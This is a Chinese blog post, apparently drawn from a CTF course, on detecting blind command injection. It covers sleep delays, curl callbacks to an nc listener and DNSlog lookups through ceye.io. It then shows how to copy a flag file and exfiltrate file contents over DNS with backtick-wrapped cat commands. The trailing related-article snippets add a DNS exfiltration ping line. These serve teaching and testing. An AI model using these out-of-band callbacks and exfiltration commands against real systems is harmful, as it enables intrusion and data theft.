检测命令注入时没有回显

最新推荐文章于 2024-03-11 21:00:12 发布
最新推荐文章于 2024-03-11 21:00:12 发布
阅读量4k 收藏 6
点赞数
分类专栏: 命令执行
原文链接:https://blog.csdn.net/anquanniu/article/details/102641702
版权
命令执行判断

命令执行可能会存在命令执行完没有回显,首先要判断命令是否有执行,可以通过三种方式来判断:延时、HTTP请求、DNS请求。

1、 延时

在这里插入图片描述

无延时无回显

在这里插入图片描述
有延时无回显

通过是否延时来判断该条命令是否有执行,有延时则代表命令有执行。(”sleep 3”表示延时3秒)

2、 HTTP请求

目标机通过向公网可通信的机子发起http请求,而这个公网可通信的机子是我们可控的,则当该公网机子收到http请求就代表命令有执行。

例:我们在公网机上可以通过”nc -lv 端口号”来监听该端口,当目标机”curl 公网机ip:端口号”的时候,公网机的该端口可以发现有http请求过来。(注意:ping命令不产生http请求)

在这里插入图片描述
公网机进行8000端口监听

在这里插入图片描述
目标机向公网机的8000端口发起http请

在这里插入图片描述
公网机监听中的8000端口收到http请求

在这里插入图片描述
将”curl 公网机ip:端口号”命令拼接到

在这里插入图片描述
公网机监听中的8000端口收到http请求

3、 DNS请求

如果请求的目标不是ip地址而是域名,那么域名最终还要转化成ip地址,就肯定要做一次域名解析请求。那么假设我有个可控的二级域名,那么它发出三级域名解析的时候,我这边是能够拿到它的域名解析请求的,这就相当于可以配合DNS请求进行命令执行的判断,这一般就被称为dnslog。(要通过dns请求即可通过ping命令,也能通过curl命令,只要对域名进行访问,让域名服务器进行域名解析就可实现)

例:大家可以去ceye.io注册个账号,注册完后会给一个域名,如果有域名解析请求会有记录。

我这边得到的域名是wzrtbq.ceye.io,如果我去访问1111111. wzrtbq.ceye.io,那么就会记录下来这个域名解析请求。
在这里插入图片描述

访问1111111. wzrtbq.ceye.io
在这里插入图片描述

域名解析请求被记录

在这里插入图片描述
将访问域名拼接到地址中

在这里插入图片描述
域名解析请求被记录

利用

1、直接写入或外部下载shell执行命令

例:通过命令执行直接得到文件内容

在这里插入图片描述
生成1.txt拷贝

在这里插入图片描述
访问1.txt

将”=cp where_is_flag.php 1.txt”做为参数传递给ping,然后就执行了” cp where_is_flag.php 1.txt”这个命令,生成1.txt文件,在去访问1.txt,就能得到1.txt的内容(也就是where_is_flag.php的内容),最后找到flag

2、通过http请求/dns请求等方式带出数据

例:通过dnslog带出数据

注意:1、命令执行时要避免空格,空格会导致空格后面的命令执行不到;2、将读取的文件命令用``包含起来;3、拼接的域名有长度限制。

在这里插入图片描述
读取where_is_flag.php:`cat where_is

在这里插入图片描述
替换读取文件中的空格:`cat where_is_

在这里插入图片描述
拼接域名:`cat where_is_flag.php|sed

在这里插入图片描述
利用dnslog

在这里插入图片描述
得到文件内容(即得到了flag文件地址)

在这里插入图片描述
获取flag文件内容

在这里插入图片描述
获取到flag

以上内容参考安全牛课堂《CTF从入门到提升

小 白 渣
关注
专栏目录
自己动手编写SQL注入漏洞扫描工具
02-16
2. **盲注**:在没有明显错误信息返回,攻击者通过判断查询结果的改变(如页面加载间变化)来确定注入的有效性。 3. **基于间的盲注**:通过延迟服务器响应间来判断条件是否为真。 4. **基于布尔的盲注**:...
深入浅出带你学习报错注入
Spontaneous_0的博客
02-19 423
深入浅出带你学习报错注入
SQL注入(MySQL查询语句、URL编码、无回显
Hardworking666的博客
01-05 2012
文章目录MySQL常用查询语句注释URL编码 MySQL常用查询语句 select user(); 当前MySQL 登录用户名 select database(); 当前MySQL 数据库名 select version(); 当前MySQL 版本 select @@version; 当前MySQL 版本 select @@basedir; 当前MySQL 安装路径(MySQL安装目录) select(length..
RCE 漏洞 CTFhub学习
qq_51954912的博客
06-05 1234
文章目录前言什么是RCE漏洞eval执行命令注入(无过滤)过滤cat 前言 之前刷buu的题的候,见过RCE漏洞的题,但是由于没有系统的学习,解题比较的困难。这次,系统的学习一下,再去解那道题。 什么是RCE漏洞 RCE英文全称:remote command/code execute 分为远程命令执行ping和远程代码执行evel。 出现的原因是:没有在输入口做输入处理。 eval执行 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST[
命令执行漏洞无回显如何渗透
xy_wjyjw的博客
11-21 114
打开bp,打开Collaborator,进行以下一系列的操作,并开启Collaborator。回到dvwa,进行ping域名。在bp中查看域名解析,解析成功。
Java中间件通用回显方法的问题及处理(7.7更新)
fnmsd的博客
06-21 1万+
之前写的《基于请求/响应对象搜索的Java中间件通用回显方法(针对HTTP)》实际使用情况中会有问题。 目前解决: 1.没有回显/高并发才有回显 2.Tomcat回显不稳定 3.URLClassLoader加载问题 4.BasicDataSource利用链问题
SQL注入攻击及其预防方法研究
07-05
3. 关闭错误回显:在服务器配置中关闭SQL错误回显,确保攻击者无法通过错误信息来了解数据库结构和设计。 4. 使用Web应用防火墙:部署Web应用防火墙可以过滤掉恶意请求,减少SQL注入攻击的风险。 5. 定期审计和...
超级SQL注入工具【SSQLInjection】V1.0 正式版 20200527.rar
04-10
这款工具可能是为了帮助安全研究人员和渗透测试人员检测和防范SQL注入漏洞而设计的。 SQL注入攻击主要利用了Web应用程序在处理用户输入的不安全性。当应用程序未对用户提供的数据进行充分验证或转义,就直接将其...
SQL注入漏洞演示源代码
01-12
1. **SQL注入原理**:当Web应用不正确地处理用户输入,攻击者可以通过输入带有SQL命令的字符串来干扰后台的SQL查询。比如,一个简单的登录表单,如果没有进行适当的输入验证,用户输入的数据可以直接拼接到SQL查询...
信息安全_深入CRS漏洞检测框架osprey.鱼鹰.pptx
08-14
对于那些无法直接回显的漏洞,如后台XSS、命令注入、SSRF等,Osprey与dnspot的协同工作提供了解决方案。dnspot是TCC的另一开源项目,它是一个DNS解析和记录服务器,可以利用DNS域名和解析进行无回显漏洞的盲检测。...
【渗透测试-web安全】DVWA-命令注入
harry_c的博客
10-28 678
【渗透测试-web安全】DVWA-命令注入一、实操二、怎么解决没有回显命令注入注入远程请求三、防范命令注入 一、实操 设置low等级 使用功能 我们发现功能是直接使用输入IP地址系统反馈ping命令的结果 首先测试 127.0.0.1 使用命令拼接:127.0.0.1&&dir 很简单就实现了命令注入,当然这是简单的等级,其他级别自行尝试,有问题可以私信我的CS...
命令执行无回显的一些姿势
zhangge3663的博客
05-31 3596
前言 最近演练遇到了拿shell后,由于是延注入,让我极其难受。于是,学习了一下命令执行无回显的一些姿势 windows环境 1.ping %USERNAME%.2plmqc.dnslog.cn 这里的%username%为用户变量 附上windows常用变量: %APPDATA% : 列出应用程序数据的默认存放位置。 %CD% : 列出当前目录。 %CLIENTNAME% : 列出联接到终端服务会话客户端的NETBIOS名。 %CMDCMDLINE% : 列出启动当前
26-3 SQL注入攻击 - SQL注入回显,盲注又被封怎么办?
最新发布
weixin_43263566的博客
03-11 627
UNC路径的格式类似于。基于间的盲注可以通过构造特定的SQL语句来判断条件是否成立,从而推测出数据库中的数据。盲注速度较慢且容易被WAF或防火墙封禁IP,因此利用DNSlog可以快速有效地获取数据,避免IP被封锁的情况。通过以上步骤,可以利用 DNSLog 平台或自行部署DNSLog来获取命令执行的回显信息,这在某些情况下可能用于安全测试或网络监控等需要的场景。需要注意的是,DNS查询过程中涉及到本地DNS服务器、根DNS服务器以及顶级域名服务器等不同级别的DNS服务器,通过逐级查询最终完成域名解析。
DVWA通关攻略之命令注入
勿山几已
05-06 2319
简要介绍命令注入漏洞,演示手工和burp爆破挖掘命令注入漏洞/RCE
命令执行漏洞没有回显如何证明
Sgirll的博客
07-19 814
yakit自带dnslog平台,申请域名,执行命令,ping一下域名,
在无回显的情况下如何判断是否存在命令注入漏洞
一个努力学习网安的小牛马
11-21 162
这种情况下可以使用OOB带外来实现,言而简之,就是利用命令执行漏洞去解析我们的dns如果dns日志有记录那就说明存在命令注入漏洞。可以看到dns日志有解析记录说明存在命令注入漏洞。在再次测试使用ping命令ping该dns。首先先简单搭建一个无回显命令注入。在dnslog上生成一个dns。构造好之后测试发现并无回显
回显命令执行PoC编写指南(Apache Shiro Java反序列化)
热门推荐
乐枕的家
08-04 1万+
回显命令成功执行与否,无法从web获取到标志性的信息,Java反序列化漏洞及属于该类型。验证方法针对无回显命令执行漏洞,让目标机执行wget、nc或者curl等命令,然后在公网主机监听对应的端口,通过日志来判断命令是否被执行。该方法可行,不过缺陷有以下几点: 修改了目标机的文件系统 不具有通用性,如windows没有nc、linux没有wget的情况。 涉及到TCP数据传输,执行速度慢 一种更好
DNSlog,ceye,burp collaboration无法访问
Withdraw_end的博客
03-08 2044
DNSlog,ceye,burp collaboration一直无法访问 其实就是被当前网络下的设备墙了,用手机开热点就解决了。
演示命令执行漏洞无回显如何确认是否执行
2301_79118231的博客
11-21 358
执行后在DNSlog收到解析,证明命令执行成功。使用dvwa中的命令执行来ping此域名。演示命令执行漏洞无回现如何渗透。在DNSlog 获取一个域名。
网络连通测试:ping命令与定IP可达检测
在华为交换机上,你可以输入相应的命令来发送ICMP回显请求,例如`ping <ip_address>`。 - 命令参数包括`-a`指定源IP地址,`-c`设置发送报文数,`-i`设置接口,`-t`设置超间等。命令的输出会显示每个回应的详细...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值